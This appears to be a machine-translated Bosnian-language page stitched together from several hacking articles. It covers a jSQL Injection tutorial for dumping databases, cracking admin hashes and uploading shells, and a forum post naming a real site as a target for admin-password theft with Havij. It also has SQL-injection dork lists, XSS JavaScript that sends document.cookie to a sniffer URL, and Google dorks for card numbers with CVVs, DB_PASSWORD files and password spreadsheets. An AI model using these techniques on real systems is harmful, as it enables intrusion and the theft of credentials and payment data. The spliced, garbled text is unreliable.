Upute za korištenje jSQL Injection, multifunkcionalnog alata za pretraživanje i iskorištavanje SQL injekcija u Kali Linuxu. Korištenje malo poznatih Google funkcija za pronalaženje skrivenog Inurl željenog php ID-a komentara

Pokrenite preuzetu datoteku dvaput kliknite(treba imati virtuelna mašina ).

3. Anonimnost prilikom provjere stranice za SQL injekciju
Postavljanje Tor i Privoxy u Kali Linux

[Odjeljak u razvoju]

Postavljanje Tor i Privoxy na Windows

[Odjeljak u razvoju]

Postavke proxyja u jSQL injekciji

[Odjeljak u razvoju]

4. Provjera stranice za SQL injekciju s jSQL injekcijom

Rad sa programom je izuzetno jednostavan. Samo unesite adresu web stranice i pritisnite ENTER.

Sljedeći snimak ekrana pokazuje da je stranica ranjiva na tri vrste SQL injekcija odjednom (informacije o njima su naznačene u donjem desnom kutu). Klikom na nazive injekcija možete promijeniti korišteni metod:

Također, postojeće baze podataka su nam već prikazane.

Možete pogledati sadržaj svake tabele:

Obično je najzanimljivija stvar u vezi sa tabelama administratorski akreditivi.

Ako imate sreće i nađete podatke administratora, onda je prerano za radovanje. Još uvijek morate pronaći admin panel gdje ćete unijeti ove podatke.

5. Potražite admin panele sa jSQL injekcijom

Da biste to učinili, idite na sljedeću karticu. Ovdje nas dočekuje lista mogućih adresa. Možete odabrati jednu ili više stranica za provjeru:

Pogodnost leži u činjenici da ne morate koristiti druge programe.

Nažalost, nema mnogo nemarnih programera koji čuvaju lozinke u čistom tekstu. Vrlo često u redu lozinke vidimo nešto slično

8743b52063cd84097a65d1633f5c74f5

Ovo je heš. Možete ga dešifrirati koristeći grubu silu. I... jSQL Injection ima ugrađeni brute forcer.

6. Brute force hashovi koristeći jSQL Injection

Nesumnjiva pogodnost je što ne morate tražiti druge programe. Postoji podrška za mnoge od najpopularnijih hashova.

Ovo nije najbolja opcija. Da biste postali guru u dekodiranju heševa, preporučuje se Knjiga “” na ruskom.

Ali, naravno, kada nema drugog programa pri ruci ili nema vremena za učenje, jSQL Injection sa svojom ugrađenom brute force funkcijom će dobro doći.

Postoje postavke: možete podesiti koji znakovi su uključeni u lozinku, raspon dužine lozinke.

7. Operacije datoteka nakon otkrivanja SQL injekcija

Osim operacija s bazama podataka - čitanje i modificiranje istih, ako se otkriju SQL injekcije, mogu se izvršiti sljedeće operacije sa datotekama:

  • čitanje datoteka na serveru
  • učitavanje novih fajlova na server
  • učitavanje školjki na server

I sve je to implementirano u jSQL Injection!

Postoje ograničenja - SQL server mora imati privilegije datoteka. Oni razumni administratori sistema oni su onemogućeni i imaju pristup sistem datoteka neće moći dobiti.

Prisutnost privilegija datoteka je prilično jednostavno provjeriti. Idite na jednu od kartica (čitanje datoteka, kreiranje ljuske, učitavanje nove datoteke) i pokušajte izvršiti jednu od navedenih operacija.

Još jedna vrlo važna napomena - moramo znati tačnu apsolutnu putanju do datoteke sa kojom ćemo raditi - inače ništa neće raditi.

Pogledajte sljedeći snimak ekrana:

Na svaki pokušaj rada na fajlu, odgovaramo: Nema privilegija FILE (nema privilegija fajla). I tu se ništa ne može učiniti.

Ako umjesto toga imate drugu grešku:

Problem sa pisanjem u [directory_name]

To znači da ste pogrešno naveli apsolutnu putanju na koju želite da upišete datoteku.

Da biste pogodili apsolutnu putanju, morate barem znati operativni sistem na kojem server radi. Da biste to učinili, prijeđite na karticu Mreža.

Ovaj unos (Win64 linija) daje nam razloga da pretpostavimo da imamo posla sa Windows OS:

Keep-Alive: timeout=5, max=99 Server: Apache/2.4.17 (Win64) PHP/7.0.0RC6 Veza: Keep-Alive Metod: HTTP/1.1 200 OK Dužina sadržaja: 353 Datum: pet, 11. decembar 2015. 11:48:31 GMT X-Powered-by: PHP/7.0.0RC6 Content-Type: text/html; charset=UTF-8

Ovdje imamo neki Unix (*BSD, Linux):

Transfer-Encoding: chunked Datum: pet, 11. decembar 2015. 11:57:02 GMT Metoda: HTTP/1.1 200 OK Keep-Alive: timeout=3, max=100 Veza: keep-alive Content-Type: text/html X- Powered-By: PHP/5.3.29 Server: Apache/2.2.31 (Unix)

I ovdje imamo CentOS:

Metoda: HTTP/1.1 200 OK Ističe: Čet, 19. novembar 1981. 08:52:00 GMT Set-Cookie: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; path=/ Veza: Keep-alive X-Cache-Lookup: MISS sa t1.hoster.ru:6666 Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.4.37 X-Cache: MISS od t1.hoster.ru Cache-Control: nema skladištenja, nema predmemorije, mora se ponovo potvrditi, post-check=0, pre-check=0 Pragma: nema predmemorije Datum: pet, 11. decembar 2015. 12:08:54 GMT Transfer-Encoding: chunked Content-Type: text/html; charset=WINDOWS-1251

Na Windows-u, tipična fascikla za lokacije je C:\Server\data\htdocs\. Ali, u stvari, ako je neko "smislio" da napravi server na Windows-u, onda, vrlo verovatno, ta osoba nije čula ništa o privilegijama. Stoga, trebali biste početi pokušavati direktno iz C:/Windows/ direktorija:

Kao što vidite, prvi put je sve prošlo kako treba.

Ali same ljuske za jSQL injekciju izazivaju sumnje u mom umu. Ako imate privilegije za fajlove, onda možete lako da otpremite nešto preko web interfejsa.

8. Grupna provjera lokacija za SQL injekcije

Čak je i ova funkcija dostupna u jSQL injekciji. Sve je krajnje jednostavno - preuzmite listu stranica (možete uvesti iz datoteke), odaberite one koje želite provjeriti i kliknite na odgovarajuće dugme da započnete operaciju.

Zaključak iz jSQL injekcije

jSQL injekcija je dobra, moćan alat za pretraživanje i naknadno korištenje SQL injekcija pronađenih na web stranicama. Njegove nesumnjive prednosti: jednostavnost korištenja, ugrađene povezane funkcije. jSQL Injection može biti najbolji prijatelj početnika kada analizira web stranice.

Među nedostacima bih istakao nemogućnost uređivanja baza podataka (barem ja nisam pronašao ovu funkcionalnost). Kao i kod svih GUI alata, jedan od nedostataka ovog programa može se pripisati njegovoj nemogućnosti da se koristi u skriptama. Ipak, moguća je i određena automatizacija u ovom programu - zahvaljujući ugrađenoj funkciji masovne provjere lokacije.

Program jSQL Injection je mnogo praktičniji za korištenje od sqlmap-a. Ali sqlmap podržava više tipova SQL injekcija, ima opcije za rad sa zaštitnim zidovima datoteka i neke druge funkcije.

Zaključak: jSQL Injection - najbolji prijatelj početnik haker.

Pomoć za ovaj program u Kali Linux Enciklopediji možete pronaći na ovoj stranici: http://kali.tools/?p=706

I tako, sada ću vam reći kako da hakujete nešto bez nekog posebnog znanja. Odmah ću reći da je malo koristi od ovoga, ali ipak.
Prvo morate pronaći same stranice. Da biste to učinili, idite na google.com i potražite dorks

Inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php? id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray- Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl: news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl: select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem. php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview.php? id= inurl:loadpsb.php?id= inurl:opinions.php?id= inurl:spr.php?id= inurl:pages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurl:participant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl: prod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurl:person.php?id= inurl:productinfo.php?id= inurl:showimg.php?id= inurl:view. php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php? id= inurl:detail.php?ID= inurl:index.php?= inurl:profile_view.php?id= inurl:category.php?id= inurl:publications.php?id= inurl:fellows.php?id= inurl :downloads_info.php?id= inurl:prod_info.php?id= inurl:shop.php?do=part&id= inurl:productinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurl :product.php?id= inurl:releases.php?id= inurl:ray.php?id= inurl:produit.php?id= inurl:pop.php?id= inurl:shopping.php?id= inurl:productdetail .php?id= inurl:post.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= inurl:theme.php ?id= inurl:page.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurl:product_ranges_view.php?ID= inurl:shop_category.php?id= inurl:transcript.php ?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2.php?option= inurl :readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl :aboutbook.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:pages.php?id= inurl:material.php?id= inurl:clanek.php4?id= inurl:announce .php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php ?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php? ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurl:opinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt= inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurl: offer.php?idf= inurl:art.php?idm= inurl:title.php?id= inurl:".php?id=1" inurl:".php?cat=1" inurl:".php?catid= 1" inurl:".php?num=1" inurl:".php?bid=1" inurl:".php?pid=1" inurl:".php?nid=1"

evo male liste. Možete koristiti svoje. I tako, pronašli smo sajt. Na primjer http://www.vestitambov.ru/
Zatim preuzmite ovaj program

**Skriveni sadržaj: Da biste vidjeli ovaj skriveni sadržaj, vaš broj objava mora biti 3 ili veći.**

Kliknite OK. Zatim ubacujemo mjesto žrtve.
Pritisnemo start. Zatim čekamo rezultate.
I tako, program je pronašao SQL ranjivost.

Zatim preuzmite Havij, http://www.vestitambov.ru:80/index.php?module=group_programs&id_gp= tamo zalijepite primljenu vezu. Neću objašnjavati kako koristiti Havij i gdje ga preuzeti nije teško. Sve. Dobili ste podatke koji su vam potrebni - administratorsku lozinku, a onda je na vašoj mašti.

P.S. Ovo je moj prvi pokušaj da nešto napišem. Izvinite ako nešto nije u redu

Odlučio sam da popričamo malo o tome sigurnost informacija. Članak će biti koristan za programere početnike i one koji su se tek počeli baviti Frontend razvojem. u čemu je problem?

Mnogi programeri početnici se toliko zanose pisanjem koda da potpuno zaborave na sigurnost svog rada. I što je najvažnije, zaboravljaju na takve ranjivosti kao što su SQL i XXS upiti. Oni također smišljaju jednostavne lozinke za svoje administrativne panele i podvrgnuti su gruboj sili. Šta su to napadi i kako ih izbjeći?

SQL injekcija

SQL injekcija je najčešći tip napada na bazu podataka, koji se izvodi tokom SQL upita za određeni DBMS. Mnogi ljudi, pa čak i velike kompanije pate od takvih napada. Razlog je greška programera pri pisanju baze podataka i, strogo govoreći, SQL upita.

Napad SQL injekcijom je moguć zbog pogrešne obrade ulaznih podataka koji se koriste u SQL upitima. Ako je hakerski napad uspješan, rizikujete da izgubite ne samo sadržaj baza podataka, već i lozinke i evidencije administrativnog panela. I ovi podaci će biti sasvim dovoljni da u potpunosti preuzmete stranicu ili izvršite nepovratna prilagođavanja na njoj.

Napad se može uspješno reprodukovati u skriptama napisanim u PHP, ASP, Perl i drugim jezicima. Uspjeh ovakvih napada više ovisi o tome koji se DBMS koristi i kako se implementira sama skripta. U svijetu postoji mnogo ranjivih lokacija za SQL injekcije. Ovo je lako provjeriti. Samo unesite "dorks" - ovo su posebni upiti za traženje ranjivih stranica. Evo nekih od njih:

  • inurl:index.php?id=
  • inurl:trainers.php?id=
  • inurl:buy.php?category=
  • inurl:article.php?ID=
  • inurl:play_old.php?id=
  • inurl:declaration_more.php?decl_id=
  • inurl:pageid=
  • inurl:games.php?id=
  • inurl:page.php?file=
  • inurl:newsDetail.php?id=
  • inurl:gallery.php?id=
  • inurl:article.php?id=

Kako ih koristiti? Dovoljno je u njih ući Google pretraživač ili Yandex. Pretraživač će vam dati ne samo ranjivu stranicu, već i stranicu o ovoj ranjivosti. Ali nećemo se tu zaustaviti i pobrinuti se da stranica bude zaista ranjiva. Da biste to učinili, dovoljno je staviti iza vrijednosti “id=1” jednostruki navodnik"'". nesto ovako:

  • inurl:games.php?id=1’

I stranica će nam dati grešku o SQL upit. Šta dalje treba našem hakeru?

A onda mu treba ovaj link do stranice greške. Zatim se rad na ranjivosti u većini slučajeva odvija u distribuciji "Kali linux" sa svojim uslužnim programima za ovaj dio: uvođenje injekcionog koda i izvođenje potrebnih operacija. Kako će se to dogoditi, ne mogu vam reći. Ali informacije o tome možete pronaći na internetu.

XSS Attack

Ova vrsta napada se izvodi na datoteke kolačića. Korisnici, pak, vole da ih spašavaju. Zašto ne? Šta bismo mi bez njih? Uostalom, zahvaljujući kolačićima, ne moramo sto puta unositi lozinku za Vk.com ili Mail.ru. I malo je onih koji ih odbijaju. Ali na internetu se za hakere često pojavljuje pravilo: koeficijent pogodnosti je direktno proporcionalan koeficijentu nesigurnosti.

Za implementaciju XSS napada, našem hakeru je potrebno znanje JavaScripta. Na prvi pogled, jezik je vrlo jednostavan i bezopasan, jer nema pristup kompjuterskim resursima. Haker može raditi samo sa JavaScriptom u pretraživaču, ali to je dovoljno. Na kraju krajeva, glavna stvar je unijeti kod na web stranicu.

Neću detaljno govoriti o procesu napada. Reći ću vam samo osnove i značenje kako se to dešava.

Haker može dodati JS kod na neki forum ili knjigu gostiju:

document.location.href =”http://192.168.1.7/sniff.php?test”

Skripte će nas preusmjeriti na zaraženu stranicu, gdje će se izvršiti kod: bilo da se radi o snifferu, nekoj vrsti pohrane ili eksploataciji, koja će na neki način ukrasti naše kolačiće iz keša.

Zašto JavaScript? Jer JavaScript je odličan u rukovanju web zahtjevima i ima pristup kolačićima. Ali ako nas naša skripta odvede na neku stranicu, korisnik će to lako primijetiti. Ovdje haker koristi lukaviju opciju - jednostavno unese kod u sliku.

Img=nova slika();

Img.src=”http://192.168.1.7/sniff.php?”+document.cookie;

Jednostavno kreiramo sliku i dodijelimo joj našu skriptu kao adresu.

Kako se zaštititi od svega ovoga? Vrlo je jednostavno - nemojte klikati na sumnjive veze.

DoS i DDos napadi

DoS (od engleskog Denial of Service - uskraćivanje usluge) - hakerski napad na kompjuterskom sistemu sa ciljem da izazove njegov otkaz. Ovo je stvaranje uslova pod kojima bona fide korisnici sistema ne mogu pristupiti pruženom sistemski resursi(serveri), ili je ovaj pristup otežan. Kvar sistema također može biti korak ka njegovom preuzimanju ako u hitnoj situaciji softver proizvede neke kritične informacije: na primjer, verziju, dio programskog koda, itd. Ali najčešće je to mjera ekonomskog pritiska: gubitak jednostavne usluge koja stvara prihod. Računi od provajdera ili mjere za izbjegavanje napada značajno pogađaju "metu" u džepu Trenutno su DoS i DDoS napadi najpopularniji, jer omogućavaju da gotovo svaki sistem propadne bez ostavljanja pravno značajnih dokaza.

Koja je razlika između DoS i DDos napada?

DoS je napad izgrađen na pametan način. Na primjer, ako server ne provjerava ispravnost dolaznih paketa, tada haker može uputiti zahtjev koji će trajati zauvijek, a procesoru neće biti dovoljno vremena za rad s drugim konekcijama. Shodno tome, klijenti će biti uskraćeni za uslugu. Ali na ovaj način neće biti moguće preopteretiti ili onemogućiti velike poznate stranice. Naoružani su prilično širokim kanalima i super-moćnim serverima koji se mogu nositi s takvim preopterećenjem bez ikakvih problema.

DDoS je zapravo isti napad kao i DoS. Ali ako u DoS-u postoji jedan paket zahtjeva, onda ih u DDoS-u može biti stotine ili više. Čak i super-moćni serveri možda neće moći da se nose sa takvim preopterećenjem. Dozvolite mi da vam dam primjer.

DoS napad je kada s nekim razgovarate, ali tada priđe neka nevaspitana osoba i počne glasno da viče. Ili je nemoguće ili veoma teško razgovarati. Rješenje: pozvati obezbjeđenje, koje će smiriti i ukloniti osobu iz prostorije. DDoS napadi su kada gomila hiljada takvih nevaspitanih ljudi uleti. U tom slučaju obezbjeđenje neće moći sve vezati i odvesti.

DoS i DDoS se izvode iz kompjutera, takozvani zombiji. Radi se o kompjuterima korisnika koje su hakirali hakeri koji ni ne sumnjaju da njihova mašina učestvuje u napadu na bilo koji server.

Kako se zaštititi od ovoga? Općenito, nema šanse. Ali možete otežati stvari hakeru. Da biste to učinili, morate odabrati dobar hosting sa moćnim serverima.

Bruteforce napad

Programer može smisliti mnogo sistema za zaštitu od napada, u potpunosti pregledati skripte koje smo napisali, provjeriti web lokaciju na ranjivosti itd. Ali kada dođe do posljednjeg koraka izgleda web stranice, odnosno kada jednostavno stavi lozinku na admin panel, može zaboraviti na jednu stvar. Lozinka!

Strogo se ne preporučuje postavljanje jednostavne lozinke. To može biti 12345, 1114457, vasya111, itd. Ne preporučuje se postavljanje lozinki kraće od 10-11 znakova. U suprotnom, možete biti izloženi najčešćem i nekomplikovanom napadu - Brute force.

Brute force je napad pomoću lozinke rječnika specijalni programi. Rječnici mogu biti različiti: latinski, nabrajanje po brojevima, recimo, do određenog raspona, mješoviti (latinica + brojevi), a postoje čak i rječnici sa jedinstvenim znakovima @#4$%&*~~`’”\ ? itd.

Naravno, ovu vrstu napada je lako izbjeći. Sve što trebate učiniti je smisliti složenu lozinku. Čak vas i captcha može spasiti. Također, ako je vaša stranica napravljena na CMS-u, onda mnogi od njih otkrivaju ovu vrstu napada i blokiraju IP. Uvijek morate zapamtiti da što je više različitih znakova u lozinki, to je teže pogoditi.

Kako rade hakeri? U većini slučajeva oni ili sumnjaju ili znaju dio lozinke unaprijed. Sasvim je logično pretpostaviti da se korisnička lozinka sigurno neće sastojati od 3 ili 5 karaktera. Takve lozinke dovode do čestog hakovanja. U osnovi, hakeri uzimaju raspon od 5 do 10 znakova i dodaju nekoliko znakova koje možda znaju unaprijed. Zatim se generiraju lozinke sa potrebnim rasponima. Kali Linux distribucija čak ima programe za takve slučajeve. I voila, napad više neće dugo trajati, jer obim rječnika više nije tako velik. Osim toga, haker može koristiti snagu video kartice. Neki od njih podržavaju CUDA sistem, a brzina pretraživanja se povećava i do 10 puta. I sada vidimo da je napad ovakav na jednostavan način sasvim realno. Ali nisu samo web stranice podložne gruboj sili.

Dragi programeri, nikada ne zaboravite na sistem sigurnosti informacija, jer danas mnogi ljudi, uključujući i države, pate od takvih vrsta napada. Uostalom, najveća ranjivost je osoba koja uvijek može negdje skrenuti pažnju ili nešto propustiti. Mi smo programeri, ali nismo programirane mašine. Uvijek budite na oprezu, jer gubitak informacija može imati ozbiljne posljedice!

Dobijanje privatnih podataka ne znači uvijek hakovanje – ponekad se objavljuje u javni pristup. Znanje Google postavke a malo domišljatosti će vam omogućiti da pronađete mnogo zanimljivih stvari - od brojeva kreditnih kartica do FBI dokumenata.

UPOZORENJE Sve informacije su date samo u informativne svrhe. Ni uredništvo ni autor nisu odgovorni za bilo kakvu moguću štetu uzrokovanu materijalima ovog članka.

Danas je sve povezano na internet, bez brige o ograničavanju pristupa. Stoga mnogi privatni podaci postaju plijen pretraživača. Spider roboti više nisu ograničeni na web stranice, već indeksiraju sav sadržaj dostupan na Internetu i stalno dodaju nejavne informacije u svoje baze podataka. Saznati ove tajne je lako - samo trebate znati kako se raspitati o njima.

U potrazi za fajlovima

U sposobnim rukama, Google će brzo pronaći sve što se ne može pronaći na internetu, na primjer, lične podatke i fajlove za službenu upotrebu. Često su skriveni kao ključ ispod tepiha: nema stvarnih ograničenja pristupa, podaci jednostavno leže na poleđini stranice, kamo ne vode nikakve veze. Googleov standardni web interfejs samo pruža osnovna podešavanja napredna pretraga, ali i ovo će biti dovoljno.

Možete ograničiti svoju Google pretragu na određenu vrstu datoteke koristeći dva operatora: filetype i ext. Prvi specificira format koji je pretraživač odredio iz naslova datoteke, drugi specificira ekstenziju datoteke, bez obzira na njen interni sadržaj. Kada pretražujete u oba slučaja, potrebno je samo navesti ekstenziju. U početku, ext operator je bio prikladan za korištenje u slučajevima kada datoteka nije imala specifične karakteristike formata (na primjer, za traženje ini i cfg konfiguracijskih datoteka, koje mogu sadržavati bilo šta). Sada su se Google algoritmi promijenili i nema vidljive razlike između operatera – u većini slučajeva rezultati su isti.


Filtriranje rezultata

Prema zadanim postavkama, Google traži riječi i, općenito, sve unesene znakove u svim datotekama na indeksiranim stranicama. Područje pretraživanja možete ograničiti domenom najviše razine, određenom web lokacijom ili lokacijom sekvence pretraživanja u samim datotekama. Za prve dvije opcije koristite operatora web mjesta, nakon čega slijedi naziv domene ili odabrane stranice. U trećem slučaju, čitav skup operatora vam omogućava da tražite informacije u poljima usluge i metapodacima. Na primjer, allinurl će pronaći dati u tijelu samih linkova, allinanchor - u tekstu opremljenom oznakom , allintitle - u naslovima stranica, allintext - u tijelu stranica.

Za svakog operatera postoji lakša verzija sa kraćim imenom (bez prefiksa all). Razlika je u tome što će allinurl pronaći veze sa svim riječima, a inurl će pronaći veze samo sa prvom od njih. Druga i sljedeće riječi iz upita mogu se pojaviti bilo gdje na web stranicama. Operator inurl se također razlikuje od drugog operatora sa sličnim značenjem - site. Prvi vam takođe omogućava da pronađete bilo koji niz znakova u linku na traženi dokument (na primjer, /cgi-bin/), koji se široko koristi za pronalaženje komponenti sa poznatim ranjivostima.

Hajde da probamo u praksi. Uzimamo allintext filter i tražimo da zahtjev proizvede listu brojeva i verifikacionih kodova kreditnih kartica koje će isteći tek za dvije godine (ili kada se vlasnici umorne od hrane svih).

Allintext: datum isteka broja kartice /2017 cvv

Kada u vijestima pročitate da je mladi haker “provalio u servere” Pentagona ili NASA-e, kradući povjerljive podatke, u većini slučajeva govorimo upravo o takvoj osnovnoj tehnici korištenja Gugla. Pretpostavimo da nas zanima lista NASA-inih zaposlenika i njihove kontakt informacije. Takva lista je sigurno dostupna u elektronskom obliku. Radi praktičnosti ili zbog nadzora, može se nalaziti i na web stranici same organizacije. Logično je da u ovom slučaju neće biti linkova na njega, jer je namijenjen za internu upotrebu. Koje riječi mogu biti u takvom fajlu? Najmanje - polje "adresa". Testiranje svih ovih pretpostavki je jednostavno.


Inurl:nasa.gov filetype:xlsx "address"


Koristimo birokratiju

Ovakvi nalazi su lijepi dodir. Zaista solidan ulov pruža detaljnije poznavanje Google-ovih operatera za webmastere, same Mreže i posebnosti strukture onoga što se traži. Poznavajući detalje, možete lako filtrirati rezultate i precizirati svojstva potrebnih datoteka kako biste u ostalom dobili zaista vrijedne podatke. Smiješno je da ovdje birokratija priskače u pomoć. Proizvodi standardne formulacije koje su pogodne za traženje tajnih informacija koje su slučajno procurile na Internet.

Na primjer, pečat izjave o distribuciji, koji zahtijeva Ministarstvo odbrane SAD-a, znači standardizirana ograničenja distribucije dokumenta. Slovo A označava javna saopštenja u kojima nema ništa tajno; B - namenjen samo za internu upotrebu, C - strogo poverljivo, i tako sve do F. Posebno se izdvaja slovo X koje označava posebno vredne podatke koji predstavljaju državnu tajnu najvišeg nivoa. Neka oni koji to treba da rade na dužnosti traže takve dokumente, a mi ćemo se ograničiti na fajlove sa slovom C. Prema DoDI direktivi 5230.24, ova oznaka se dodjeljuje dokumentima koji sadrže opis kritičnih tehnologija koje potpadaju pod kontrolu izvoza . Takve pažljivo zaštićene informacije možete pronaći na stranicama u domeni najvišeg nivoa.mil, namijenjenoj američkoj vojsci.

"IZJAVA O DISTRIBUCIJI C" inurl:navy.mil

Veoma je zgodno da domen .mil sadrži samo sajtove Ministarstva odbrane SAD i njegovih ugovornih organizacija. Rezultati pretrage sa ograničenjem domene su izuzetno čisti, a naslovi govore sami za sebe. Potraga za ruskim tajnama na ovaj način je praktički beskorisna: haos vlada u domenima.ru i.rf, a imena mnogih oružanih sistema zvuče kao botanički (PP "Kiparis", samohodne topove "Akatsia") ili čak fantastično ( TOS “Buratino”).


Pažljivim proučavanjem bilo kog dokumenta sa sajta u domenu .mil, možete videti druge markere kako biste precizirali pretragu. Na primjer, referenca na ograničenja izvoza “Sec 2751”, koja je također zgodna za traženje zanimljivih tehničkih informacija. S vremena na vrijeme se uklanja sa zvaničnih stranica na kojima se nekada pojavio, pa ako ne možete pratiti zanimljiv link u rezultatima pretrage, koristite Googleov keš (cache operator) ili web stranicu Internet Archive.

Penjanje u oblake

Osim slučajno deklasificiranih vladinih dokumenata, u Googleovoj keš memoriji povremeno se pojavljuju linkovi ka ličnim datotekama iz Dropboxa i drugih servisa za pohranu podataka koji stvaraju “privatne” veze ka javno objavljenim podacima. Još je gore s alternativnim i domaćim uslugama. Na primjer, sljedeći upit pronalazi podatke za sve Verizon kupce koji imaju instaliran FTP server i aktivno koriste svoj ruter.

Allinurl:ftp:// verizon.net

Takvih pametnih ljudi sada ima više od četrdeset hiljada, a u proljeće 2015. bilo ih je mnogo više. Umjesto Verizon.net-a, možete zamijeniti ime bilo kojeg poznatog provajdera, a što je poznatiji, ulov može biti veći. Preko ugrađenog FTP servera možete vidjeti datoteke na vanjskom uređaju za pohranu koji je povezan s ruterom. Obično je ovo NAS za daljinski rad, lični oblak ili neka vrsta peer-to-peer preuzimanja datoteka. Sav sadržaj takvih medija indeksira Google i drugi pretraživači, tako da možete pristupiti datotekama pohranjenim na vanjskim diskovima putem direktne veze.

Gledajući konfiguracije

Prije masovne migracije na oblak, jednostavni FTP serveri su vladali kao udaljena pohrana, koja je također imala dosta ranjivosti. Mnogi od njih su i danas aktuelni. Na primjer, popularni program WS_FTP Professional pohranjuje konfiguracijske podatke, korisničke račune i lozinke u datoteci ws_ftp.ini. Lako ga je pronaći i pročitati, jer se svi zapisi čuvaju u tekstualnom formatu, a lozinke su šifrovane trostrukim DES algoritmom nakon minimalnog zamagljivanja. U većini verzija dovoljno je jednostavno odbaciti prvi bajt.

Lako je dešifrirati takve lozinke koristeći uslužni program WS_FTP Password Decryptor ili besplatni web servis.

Govoreći o hakiranju proizvoljne web stranice, obično podrazumijevaju dobivanje lozinke iz logova i sigurnosne kopije konfiguracijskih datoteka CMS-a ili aplikacija za e-trgovina. Ako znate njihovu tipičnu strukturu, lako možete naznačiti ključne riječi. Linije poput onih koje se nalaze u ws_ftp.ini su izuzetno česte. Na primjer, u Drupalu i PrestaShop-u uvijek postoji identifikator korisnika (UID) i odgovarajuća lozinka (pwd), a sve informacije se pohranjuju u datoteke sa ekstenzijom .inc. Možete ih tražiti na sljedeći način:

"pwd=" "UID=" ext:inc

Otkrivanje DBMS lozinki

U konfiguracijskim datotekama SQL servera, imena i adrese email korisnici se pohranjuju u čistom tekstu, a umjesto lozinki, snimaju se njihovi MD5 hešovi. Strogo govoreći, nemoguće ih je dešifrirati, ali možete pronaći podudaranje među poznatim parovima heš-lozinke.

Još uvijek postoje DBMS-ovi koji čak i ne koriste heširanje lozinke. Konfiguracijske datoteke bilo koje od njih mogu se jednostavno pregledati u pretraživaču.

Intext:DB_PASSWORD tip datoteke:env

Od pojavljivanja na Windows serveri Mjesto konfiguracijskih datoteka djelimično je zauzeo registar. Možete pretraživati ​​njegove grane na potpuno isti način, koristeći reg kao tip datoteke. Na primjer, ovako:

Tip datoteke:reg HKEY_CURRENT_USER "Lozinka"=

Ne zaboravimo očigledno

Ponekad je moguće doći do povjerljivih informacija uz pomoć slučajno otvorenih i uhvaćenih u vidno polje Google podaci. Idealna opcija je pronaći listu lozinki u nekom uobičajenom formatu. Sačuvajte informacije o nalogu u tekstualnu datoteku, Word dokument ili elektronski Excel tabela Mogu samo očajnici, ali ih uvijek ima dovoljno.

Tip datoteke:xls inurl:lozinka

S jedne strane, postoji mnogo sredstava za sprečavanje ovakvih incidenata. Potrebno je navesti adekvatna prava pristupa u htaccess-u, zakrpiti CMS, ne koristiti ljevoruke skripte i zatvoriti ostale rupe. Postoji i datoteka sa listom izuzetaka robots.txt koja zabranjuje pretraživačima da indeksiraju datoteke i direktorije navedene u njoj. S druge strane, ako se struktura robots.txt na nekom serveru razlikuje od standardne, onda odmah postaje jasno šta na njemu pokušavaju da sakriju.

Listi direktorija i datoteka na bilo kojoj stranici prethodi standardni indeks. Budući da se za potrebe usluge mora pojaviti u naslovu, ima smisla ograničiti njegovu pretragu na operator naslova. Zanimljive stvari su u direktorijumima /admin/, /personal/, /etc/, pa čak i /secret/.

Pratite novosti

Relevantnost je ovdje izuzetno važna: stare ranjivosti se vrlo sporo zatvaraju, ali Google i njegovi rezultati pretraživanja se stalno mijenjaju. Postoji čak i razlika između filtera "poslednje sekunde" (&tbs=qdr:s na kraju URL-a zahtjeva) i filtera "u stvarnom vremenu" (&tbs=qdr:1).

Vremenski interval datuma najnovije ažuriranje Google takođe implicitno ukazuje na fajl. Preko grafičkog web sučelja možete odabrati jedan od standardnih perioda (sat, dan, sedmica, itd.) ili postaviti raspon datuma, ali ovaj metod nije pogodan za automatizaciju.

Iz izgleda adresne trake, možete samo nagađati o načinu da ograničite izlaz rezultata korištenjem &tbs=qdr: konstrukcije. Slovo y nakon njega postavlja granicu od jedne godine (&tbs=qdr:y), m prikazuje rezultate za posljednji mjesec, w - za sedmicu, d - za prošli dan, h - za posljednji sat, n - za minut, a s - za sekundu. Najnoviji rezultati koji su upravo postali poznati Googleu nalaze se pomoću &tbs=qdr:1 filtera.

